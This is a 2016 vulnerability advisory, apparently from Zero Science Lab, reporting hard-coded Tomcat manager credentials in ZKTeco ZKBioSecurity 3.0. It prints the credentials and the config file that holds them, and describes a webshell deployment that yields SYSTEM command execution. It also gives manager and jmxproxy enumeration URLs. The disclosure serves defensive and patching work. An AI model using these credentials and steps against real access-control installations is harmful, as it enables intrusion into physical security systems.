i>>?
ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The ZKBioSecurity solution suffers from a use of hard-coded credentials.
The application comes bundled with a pre-configured apache tomcat server and an
exposed 'manager' application that after authenticating with the credentials:
username: zkteco, password: zkt123, located in tomcat-users.xml file, it allows
malicious WAR archive containing a JSP application to be uploaded, thus giving
the attacker the ability to execute arbitrary code with SYSTEM privileges.

Ref: https://www.exploit-db.com/exploits/31433/


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5362
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php


18.07.2016

--


Contents of tomcat-users.xml:
-----------------------------

C:\Program Files (x86)\BioSecurity\MainResource\tomcat\conf\tomcat-users.xml:

<?xml version='1.0' encoding='utf-8'?>
...
...
...
<role rolename="manager-gui"/>  
<role rolename="manager-script"/>  
<role rolename="manager-jmx"/>  
<role rolename="manager-status"/>  
<user password="zkt123" roles="manager-gui,manager-script,manager-jmx,manager-status" username="zkteco"/>  
</tomcat-users>

-----------------------------


Open Manager application and login:
-----------------------------------

http://127.0.0.1:8088/manager (zkteco:zkt123)


Deploy JSP webshell, issue command:
-----------------------------------

- Request: whoami
- Response: nt authority\system


call the findConnectors() method of the Service use:
----------------------------------------------------

http://127.0.0.1:8088/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=

Response:

OK - Operation findConnectors returned:
  Connector[HTTP/1.1-8088]
  Connector[AJP/1.3-8019]


List of all loaded servlets:
----------------------------

http://127.0.0.1:8088/manager/jmxproxy/?j2eeType=Servlet